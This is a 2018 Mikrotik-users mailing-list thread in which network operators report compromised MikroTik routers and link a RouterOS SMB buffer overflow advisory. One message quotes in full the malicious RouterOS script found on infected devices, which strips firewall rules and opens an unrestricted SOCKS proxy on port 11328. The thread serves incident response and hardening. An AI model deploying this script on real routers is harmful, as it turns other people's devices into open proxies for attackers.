Been cleaning this up for random clients daily now....hence the reason i am very strongly voicing zero open ports (except l2tp and ipsec) to the outside network...
:: // Shawn Peppers :: // DirectlinkAdmin.com > On Aug 5, 2018, at 7:57 PM, Bob Pensworth <[email protected]> wrote: > > We are finding an IP/Socks connection: > We are finding an event entry in System/Scheduler > And the (below) script in System/Script: > > /ip firewall filter remove [/ip firewall filter find where comment ~ "port > [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 > connection-idle-timeout=60;/ip socks access remove [/ip socks access > find];/ip firewall filter add chain=input protocol=tcp port=11328 > action=accept comment="port 11328";/ip firewall filter move [/ip firewall > filter find comment="port 11328"] 1; > > -- > Bob Pensworth, WA7BOB | General Manager > CresComm WiFi, LLC | (360) 928-0000, x1 > > From: [email protected] <[email protected]> On > Behalf Of Shawn C. Peppers via Mikrotik-users > Sent: Friday, March 16, 2018 11:54 AM > To: [email protected]; [email protected] > Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 > > I have not tested this yet but.... > > https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow > > :: // Shawn Peppers > :: // DirectlinkAdmin.com
_______________________________________________ Mikrotik-users mailing list [email protected] http://lists.wispa.org/mailman/listinfo/mikrotik-users
